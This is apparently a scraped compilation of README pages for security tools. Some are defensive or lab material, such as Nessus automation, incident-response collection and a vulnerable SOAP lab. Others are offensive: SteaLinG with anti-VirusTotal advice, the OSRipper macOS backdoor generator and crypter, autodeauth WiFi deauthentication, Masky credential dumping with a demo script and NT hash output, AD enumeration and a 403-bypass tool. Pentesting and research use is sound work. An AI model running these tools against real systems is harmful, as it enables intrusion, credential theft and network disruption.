git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py
* Don't Upload in VirusTotal.com Bcz This tool will not work with Time.
* Virustotal Share Signatures With AV Comapnies.
* Again Don't be an Idiot!
Today, with the spread of information technology systems, investments in the field of cyber security have increased to a great extent. Vulnerability management, penetration tests and various analyzes are carried out to accurately determine how much our institutions can be affected by cyber threats. With Tenable Nessus, the industry leader in vulnerability management tools, an IP address that has just joined the corporate network, a newly opened port, exploitable vulnerabilities can be determined, and a python application that can work integrated with Tenable Nessus has been developed to automatically identify these processes.
git clone https://github.com/anil-yelken/Nessus-Automation cd Nessus-Automation sudo pip3 install requirements.txt
The SIEM IP address in the codes should be changed.
In order to detect a new IP address exactly, it was checked whether the phrase "Host Discovery" was used in the Nessus scan name, and the live IP addresses were recorded in the database with a timestamp, and the difference IP address was sent to SIEM. The contents of the hosts table were as follows:
Usage: python finding-new-ip-nessus.py
By checking the port scans made by Nessus, the port-IP-time stamp information is recorded in the database, it detects a newly opened service over the database and transmits the data to SIEM in the form of "New Port:" port-IP-time stamp. The result observed by SIEM is as follows:
Usage: python finding-new-port-nessus.py
In the findings of vulnerability scans made in institutions and organizations, primarily exploitable vulnerabilities should be closed. At the same time, it records the vulnerabilities in the database that can be exploited with metasploit in the institutions and transmits this information to SIEM when it finds a different exploitable vulnerability on the systems. Exploitable vulnerabilities observed by SIEM:
Usage: python finding-exploitable-service-nessus.py
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.
Wardriving is done by combining the SSID information obtained with scapy using the HTML5 geolocation feature.
I cannot be held responsible for the malicious use of the vehicle.
ssidBul.py has been tested via TP-LINK TL WN722N.
Selenium 3.11.0 and Firefox 59.0.2 are used for location.py. Firefox geckodriver is located in the directory where the codes are.
SSID and MAC names and location information were created and changed in the test environment.
ssidBul.py and location.py must be run concurrently.
ssidBul.py result:
20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M
20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068
Here is a screenshot of allowing location information while running location.py:
The screenshot of the location information is as follows:
konum.py result:
lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM
lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM
After the data collection processes, the following output is obtained as a result of running wardriving.py:
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M
lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
Unoffical Flipper Zero cli wrapper written in Python
$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt
from pyflipper import PyFlipper
#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")
#OR
#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")
#Info
info = flipper.power.info()
#Poweroff
flipper.power.off()
#Reboot
flipper.power.reboot()
#Reboot in DFU mode
flipper.power.reboot2dfu()
#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")
#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")
#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")
#List installed apps
apps = flipper.loader.list()
#Open app
flipper.loader.open(app_name="Clock")
#Get flipper date
date = flipper.date.date()
#Get flipper timestamp
timestamp = flipper.date.timestamp()
#Get the processes dict list
ps = flipper.ps.list()
#Get device info dict
device_info = flipper.device_info.info()
#Get heap info dict
heap = flipper.free.info()
#Get free_blocks string
free_blocks = flipper.free.blocks()
#Get bluetooth info
bt_info = flipper.bt.info()
#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")
#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")
#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")
#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")
#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")
#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")
#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")
#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")
#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")
#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")
#Write file in one chunk
file = "/ext/bar.txt"
text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""
flipper.storage.write.file(file, text)
#Write file using a listener
file = "/ext/foo.txt"
text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""
flipper.storage.write.start(file)
time.sleep(2)
flipper.storage.write.send(text_one)
text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)
time.sleep(3)
#Don't forget to stop
flipper.storage.write.stop()
#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)
#Set blue led off
flipper.led.blue(value=0)
#Set green led value
flipper.led.green(value=175)
#Set backlight on
flipper.led.backlight_on()
#Set backlight off
flipper.led.backlight_off()
#Turn off led
flipper.led.off()
#Set vibro True or False
flipper.vibro.set(True)
#Set vibro on
flipper.vibro.on()
#Set vibro off
flipper.vibro.off()
#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)
#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)
#Set gpio pin value
flipper.gpio.mode(pin_name=PIN_NAME, value=1)
#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"
#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)
#Stop loop
flipper.music_player.stop()
#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)
#Beep
flipper.music_player.beep()
#Beep for 5 seconds
flipper.music_player.beep(duration=5)
#Synchronous default timeout 5 seconds
#Detect NFC
nfc_detected = flipper.nfc.detect()
#Emulate NFC
flipper.nfc.emulate()
#Activate field
flipper.nfc.field()
#Synchronous default timeout 5 seconds
#Read RFID
rfid = flipper.rfid.read()
#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)
#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")
#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")
#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])
#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)
#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()
#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")
#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")
#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()
#Activate debug mode
flipper.debug.on()
#Deactivate debug mode
flipper.debug.off()
#Search
response = flipper.onewire.search()
#Get
response = flipper.i2c.get()
#Input dump
dump = flipper.input.dump()
#Send input
flipper.input.send("up", "press")
Feel free to contribute in any way
ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7
ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54
BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat
OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.
You can also PM me on discord for support or to ask for new features SubGlitch1#2983
Please check the wiki for information on how OSRipper functions (which changes extremely frequently)
https://github.com/SubGlitch1/OSRipper/wiki
Here are example backdoors which were generated with OSRipper
macOS .apps will look like this on vt
You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.
Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.
apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt
or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3
Only this
sudo python3 main.py
Please feel free to fork and open pull repuests. Suggestions/critisizm are appreciated as well
Coming soon
Just open a issue and ill make sure to get back to you
0.2.1
0.1.6
0.1.5
0.1.4
0.1.3
0.1.2
0.1.1
MIT
Inspiration, code snippets, etc.
I am very sorry to even write this here but my finances are not looking good right now. If you appreciate my work i would really be happy about any donation. You do NOT have to this is solely optional
BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T
I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.
Aced is a tool to parse and resolve a single targeted Active Directory principal's DACL. Aced will identify interesting inbound access allowed privileges against the targeted account, resolve the SIDS of the inbound permissions, and present that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally which can then be parsed by pyldapsearch's companion tool BOFHound to ingest the collected data into BloodHound.
I wrote Aced simply because I wanted a more targeted approach to query ACLs. Bloodhound is fantastic, however, it is extremely noisy. Bloodhound collects all the things while Aced collects a single thing providing the operator more control over how and what data is collected. There's a phrase the Navy Seals use: "slow is smooth and smooth is fast" and that's the approach I tried to take with Aced. The case for detection is reduced by only querying for what LDAP wants to tell you and by not performing an action known as "expensive ldap queries". Aced has the option to forego SMB connections for hostname resolution. You have the option to prefer LDAPS over LDAP. With the additional integration with BloodHound, the collected data can be stored in a familiar format that can be shared with a team. Privilege escalation attack paths can be built by walking backwards from the targeted goal.
Thanks to the below for all the code I stole:
@_dirkjan
@fortaliceLLC
@eloygpz
@coffeegist
@tw1sm
└─# python3 aced.py -h
_____
|A . | _____
| /.\ ||A ^ | _____
|(_._)|| / \ ||A _ | _____
| | || \ / || ( ) ||A_ _ |
|____V|| . ||(_'_)||( v )|
|____V|| | || \ / |
|____V|| . |
|____V|
v1.0
Parse and log a target principal's DACL.
@garrfoster
usage: aced.py [-h] [-ldaps] [-dc-ip DC_IP] [-k] [-no-pass] [-hashes LMHASH:NTHASH] [-aes hex key] [-debug] [-no-smb] target
Tool to enumerate a single target's DACL in Active Directory
optional arguments:
-h, --help show this help message and exit
Authentication:
target [[domain/username[:password]@]<address>
-ldaps Use LDAPS isntead of LDAP
Optional Flags:
-dc-ip DC_IP IP address or FQDN of domain controller
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
-no-pass don't ask for password (useful for -k)
-hashes LMHASH:NTHASH
LM and NT hashes, format is LMHASH:NTHASH
-aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-debug Enable verbose logging.
-no-smb Do not resolve DC hostname through SMB. Requires a FQDN with -dc-ip.
In the below demo, we have the credentials for the corp.local\lowpriv account. By starting enumeration at Domain Admins, a potential path for privilege escalation is identified by walking backwards from the high value target.
And here's how that data looks when transformed by bofhound and ingested into BloodHound.
A tool built to automatically deauth local networks
$ chmod +x setup.sh
$ sudo ./setup.sh
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Please enter your WiFi interface name e.g: wlan0 -> wlan1
autodeauth installed
use sudo autodeauth or systemctl start autodeauth
to edit service setting please edit: service file: /etc/systemd/system/autodeauth.service
$ sudo autodeauth -h
_ _ ___ _ _
/_\ _ _| |_ ___| \ ___ __ _ _ _| |_| |_
/ _ \ || | _/ _ \ |) / -_) _` | || | _| ' \
/_/ \_\_,_|\__\___/___/\___\__,_|\_,_|\__|_||_|
usage: autodeauth [-h] --interface INTERFACE [--blacklist BLACKLIST] [--whitelist WHITELIST] [--led LED] [--time TIME] [--random] [--ignore] [--count COUNT] [--verbose VERBOSE]
Auto Deauth Tool
options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Interface to fetch WiFi networks and send deauth packets (must support packet injection)
--blacklist BLACKLIST, -b BLACKLIST
List of networks ssids/mac addre sses to avoid (Comma seperated)
--whitelist WHITELIST, -w WHITELIST
List of networks ssids/mac addresses to target (Comma seperated)
--led LED, -l LED Led pin number for led display
--time TIME, -t TIME Time (in s) between two deauth packets (default 0)
--random, -r Randomize your MAC address before deauthing each network
--ignore Ignore errors encountered when randomizing your MAC address
--count COUNT, -c COUNT
Number of packets to send (default 5000)
--verbose VERBOSE, -v VERBOSE
Scapy verbosity setting (default: 0)
After running the setup you are able to run the script by using autodeauth from any directory
Networks with spaces can be represented using their mac addresses
$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,E1:DB:12:2F:C1:57 -c 10000
$ sudo systemctl start autodeauth
When a network is detected and fits under the whitelist/blacklist criteria its network information is saved as a json file in /var/log/autodeauth/
{
"ssid": "MyWiFiNetwork",
"mac_address": "10:0B:21:2E:C1:11",
"channel": 1,
"network.frequency": "2.412 GHz",
"mode": "Master",
"bitrates": [
"6 Mb/s",
"9 Mb/s",
"12 Mb/s",
"18 Mb/s",
"24 Mb/s",
"36 Mb/s",
"48 Mb/s",
"54 Mb/s"
],
"encryption_type": "wpa2",
"encrypted": true,
"quality": "70/70",
"signal": -35
}
$ cat /var/log/autodeauth/log
2022-08-20 21:01:31 - Scanning for local networks
2022-08-20 21:20:29 - Sending 5000 deauth frames to network: A0:63:91:D5:B8:76 -- MyWiFiNetwork
2022-08-20 21:21:00 - Exiting/Cleaning up
To change the settings of the autodeauth service edit the file /etc/systemd/system/autodeauth.service
Lets say you wanted the following config to be setup as a service
$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000
$ vim /etc/systemd/system/autodeauth.service
Then you would change the ExecStart line to
ExecStart=/usr/bin/python3 /usr/local/bin/autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000
Masky is a python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX, NT hashes and TGT on a larger scope.
This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. Indeed, it only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via kerberos & NT hashes retrieval via PKINIT). A blog post was published to detail the implemented technics and how Masky works.
Masky source code is largely based on the amazing Certify and Certipy tools. I really thanks their authors for the researches regarding offensive exploitation technics against ADCS (see. Acknowledgments section).
Masky python3 library and its associated CLI can be simply installed via the public PyPi repository as following:
pip install masky
The Masky agent executable is already included within the PyPi package.
Moreover, if you need to modify the agent, the C# code can be recompiled via a Visual Studio project located in agent/Masky.sln
. It would requires .NET Framework 4
to be built.
Masky has been designed as a Python library. Moreover, a command line interface was created on top of it to ease its usage during pentest or RedTeam activities.
For both usages, you need first to retrieve the FQDN of a CA server
and its CA name
deployed via an ADCS. This information can be easily retrieved via the certipy find
option or via the Microsoft built-in certutil.exe
tool. Make sure that the default User
template is enabled on the targeted CA.
Warning: Masky deploys an executable on each target via a modification of the existing RasAuto
service. Despite the automated roll-back of its intial ImagePath
value, an unexpected error during Masky runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such unwanted stop.
The following demo shows a basic usage of Masky by targeting 4 remote systems. Its execution allows to collect NT hashes, CCACHE and PFX of 3 distincts domain users from the sec.lab testing domain.
Masky also provides options that are commonly provided by such tools (thread number, authentication mode, targets loaded from files, etc. ).
__ __ _
| \/ | __ _ ___| | ___ _
| |\/| |/ _` / __| |/ / | | |
| | | | (_| \__ \ <| |_| |
|_| |_|\__,_|___/_|\_\__, |
v0.0.3 |___/
usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]
positional arguments:
targets Targets in CIDR, hostname and IP formats are accepted, from a file or not
options:
-h, --help show this help message and exit
-v, --verbose Enable debugging messages
-ts, --timestamps Display timestamps for each log
-t THREADS, --threads THREADS
Threadpool size (max 15)
Authentication:
-d DOMAIN, --domain DOMAIN
Domain name to authenticate to
-u USER, --user USER Username to au thenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)
Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVER\CA_NAME)
Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folde r if it does not exit)
Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.
from masky import Masky
from getpass import getpass
def dump_nt_hashes():
# Define the authentication parameters
ca = "srv-01.sec.lab\sec-SRV-01-CA"
dc_ip = "192.168.23.148"
domain = "sec.lab"
user = "askywalker"
password = getpass()
# Create a Masky instance with these credentials
m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)
# Set a target and run Masky against it
target = "192.168.23.130"
rslts = m.run(target)
# Check if Masky succesfully hijacked at least a user session
# or if an unexpected error occured
if not rslts:
return False
# Loop on MaskyResult object to display hijacked users and to retreive their NT hashes
print(f"Results from hostname: {rslts.hostname}")
for user in rslts.users:
print(f"\t - {user.domain}\{user.n ame} - {user.nt_hash}")
return True
if __name__ == "__main__":
dump_nt_hashes()
Its execution generate the following output.
$> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
- sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
- sec\askywalker - 8928e0723012a8471c0084149c4e23b1
- sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a
A MaskyResults
object containing a list of User
objects is returned after a successful execution of Masky.
Please look at the masky\lib\results.py
module to check the methods and attributes provided by these two classes.
Erlik - Vulnerable Soap Service
Tested - Kali 2022.1
It is a vulnerable SOAP web service. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.
It contains the following vulnerabilities.
git clone https://github.com/anil-yelken/Vulnerable-Soap-Service
cd Vulnerable-Soap-Service
sudo pip3 install requirements.txt
sudo python3 vulnerable_soap.py
Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/lfi.py
Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/sqli.py
Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_logs_information_disclosure.py
Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_data_information_disclosure.py
Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/commandi.py
Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/brute.py
Code:
https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_socket.py
https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_requests.py
This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.
If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.
The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without.
Data will be collected in two forms. First is in the form of summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser
module will output a browser_extensions.txt
file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.
The second are complete files collected from the filesystem. These are stored in an artifacts
subfolder inside the collection folder.
The script is very simple to run. It takes only one parameter, which is required, to pass in a configuration script in JSON format:
./pict.py -c /path/to/config.json
The configuration script describes what the script will collect, and how. It should look something like this:
This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared
.
Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD
, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.
If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.
PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.
The collectors
data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py
extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused
.
This dictionary provides global settings.
keepLSData
specifies whether the lsregister.txt
file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)
zipIt
specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.
This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts
being used with the browser
module.
There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.
collectArtifacts
specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.
Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py
), and they must be placed in the collectors
folder. A new Collector module can be easily created by duplicating the collectors/template.py
file and customizing it for your own use.
def __init__(self, collectionPath, allUsers)
This method can be overridden if necessary, but the super Collector.init() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.
def printStartInfo(self)
This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.
def applySettings(self, settingsDict)
This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collection class can handle any settings that it defines.
def collect(self)
This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath
, and should use filenames that are not already taken by other modules.
If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect
array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts
folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.
When the method finishes, be sure to call the super (Collector.collect(self)
) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.
Your collect
method can use any data collected in the basic_info.txt
or lsregister.txt
files found at self.collectionPath
. These are collected at the beginning by the pict.py
script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.
Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.
Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.
sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd silenthound
pipenv install
This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv withpipenv shell
or run commands directly withpipenv run
.
This method is not recommended because python-ldap can cause many dependency errors.
Install dependencies with pip
:
python3 -m pip install -r requirements.txt
python3 silenthound.py -h
$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain
Quietly enumerate an Active Directory environment.
positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP passwo rd - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.
A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.
Using the -o
flag will result in output files for each section normally in stdout. The files created using all flags will be:
-rw-r--r-- 1 kali kali 122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r-- 1 kali kali 60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r-- 1 kali kali 2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r-- 1 kali kali 89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r-- 1 kali kali 1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r-- 1 kali kali 66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r-- 1 kali kali 529 Jun 30 11:37 BASENAME-users.txt
For additional feature requests please submit an issue and add the enhancement
tag.
modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTF's in order to pinpoint where escalation and attack vectors may exist.
To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib
. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).
modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT for the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification times of each file, then orders these modification times in order to output them chronologically.
Additionally, in the output you will potentially see some files highlighted red. These files are denoted as "Indicators of User Activity," Since recent modifications to these files indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.
modDetective currently works only with python3; python2 compatability will be completed shortly (hence the lack of f strings). Standard libraries should be fine.
Tool that tests MANY
url bypasses to reach a 40X protected page
.
If you wonder why this code is nothing but a dirty curl wrapper
, here's why:
This is surprisingly hard
to achieve in python without loosing all of the lib goodies like parsing, ssl/tls encapsulation and so on.
So, be like me, use curl as a backend
, it's gonna be just fine.
# Deps
sudo apt install -y bat curl virtualenv python3
# Tool
virtualenv -p python3 .py3
source .py3/bin/activate
pip install -r requirements.txt
./bypass-url-parser.py --url "http://127.0.0.1/juicy_403_endpoint/"
2022-05-10 15:54:03 work bup[738125] INFO === Config ===
2022-05-10 15:54:03 work bup[738125] INFO debug: False
2022-05-10 15:54:03 work bup[738125] INFO url: http://thinkloveshare.com/api/jolokia/list
2022-05-10 15:54:03 work bup[738125] INFO outdir: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:03 work bup[738125] INFO threads: 20
2022-05-10 15:54:03 work bup[738125] INFO timeout: 2
2022-05-10 15:54:03 work bup[738125] INFO headers: {}
2022-05-10 15:54:03 work bup[738125] WARNING Stage: generate_curls
2022-05-10 15:54:03 work bup[738125] INFO base_url: http://thinkloveshare.com
2022-05-10 15:54:03 work bup[738125] INFO base_path: /api/jolokia/list
2022-05-10 15:54:03 work bup[738125] WARNING Stage: run_curls
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64 ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'CONNECT' 'http://thinkloveshare.com/api/jolokia/list'
